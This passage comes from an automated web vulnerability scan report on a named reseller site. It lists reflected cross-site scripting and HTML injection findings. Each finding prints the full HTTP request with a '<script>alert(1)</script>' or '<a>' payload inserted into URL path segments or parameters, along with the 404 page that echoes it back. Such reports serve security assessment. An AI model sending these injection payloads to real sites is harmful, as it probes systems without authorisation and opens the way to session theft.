<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images3c17e<script>alert(1)</script>56dfc02bed3/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1430. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ee222<script>alert(1)</script>cddb10b6b20 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/ratingee222<script>alert(1)</script>cddb10b6b20/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/ratingee222<script>alert(1)</script>cddb10b6b20/3half.gif was not found on this server.</p>
...[SNIP]...

2.1431. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 5229d<script>alert(1)</script>1e2b27f7c97 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/3half.gif5229d<script>alert(1)</script>1e2b27f7c97 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/3half.gif5229d<script>alert(1)</script>1e2b27f7c97 was not found on this server.</p>
...[SNIP]...

2.1432. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 336f4<script>alert(1)</script>51e04780ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/3half.gif?336f4<script>alert(1)</script>51e04780ef3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/3half.gif?336f4<script>alert(1)</script>51e04780ef3=1 was not found on this server.</p>
...[SNIP]...

2.1433. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3987<script>alert(1)</script>8b66fb92144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb3987<script>alert(1)</script>8b66fb92144/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb3987<script>alert(1)</script>8b66fb92144/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1434. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4df78<script>alert(1)</script>5ee33762d84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/174df78<script>alert(1)</script>5ee33762d84/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/174df78<script>alert(1)</script>5ee33762d84/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1435. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1683<script>alert(1)</script>089f8704369 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themesd1683<script>alert(1)</script>089f8704369/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themesd1683<script>alert(1)</script>089f8704369/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1436. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b727c<script>alert(1)</script>a949668be25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmosb727c<script>alert(1)</script>a949668be25/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmosb727c<script>alert(1)</script>a949668be25/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1437. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e5ac9<script>alert(1)</script>60b66a13951 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/imagese5ac9<script>alert(1)</script>60b66a13951/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/imagese5ac9<script>alert(1)</script>60b66a13951/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1438. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d0f28<script>alert(1)</script>76cdcade775 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/ratingd0f28<script>alert(1)</script>76cdcade775/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/ratingd0f28<script>alert(1)</script>76cdcade775/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1439. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 52c67<script>alert(1)</script>9cbb1913c7c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/search.php52c67<script>alert(1)</script>9cbb1913c7c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php52c67<script>alert(1)</script>9cbb1913c7c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1440. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload de533<a>b3461a350b2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchde533<a>b3461a350b2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchde533<a>b3461a350b2&opt=2 was not found on this server.</p>
...[SNIP]...

2.1441. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c4e3f<a>0cfed7915a5 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...c4e3f<a>0cfed7915a5&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php?keyword=search...c4e3f<a>0cfed7915a5&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1442. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d00b0<script>alert(1)</script>ec1a1765a6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&d00b0<script>alert(1)</script>ec1a1765a6e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&d00b0<script>alert(1)</script>ec1a1765a6e=1 was not found on this server.</p>
...[SNIP]...

2.1443. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d6e0b<a>be8bad20508 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d6e0b<a>be8bad20508 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d6e0b<a>be8bad20508 was not found on this server.</p>
...[SNIP]...

2.1444. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fdcf<script>alert(1)</script>1a8ef12489e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8fdcf<script>alert(1)</script>1a8ef12489e/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8fdcf<script>alert(1)</script>1a8ef12489e/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1445. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90f23<script>alert(1)</script>9e351caa8ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1790f23<script>alert(1)</script>9e351caa8ae/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1790f23<script>alert(1)</script>9e351caa8ae/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1446. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83470<script>alert(1)</script>c8f6b200cd1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes83470<script>alert(1)</script>c8f6b200cd1/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes83470<script>alert(1)</script>c8f6b200cd1/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1447. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3770a<script>alert(1)</script>c28160dba38 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos3770a<script>alert(1)</script>c28160dba38/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

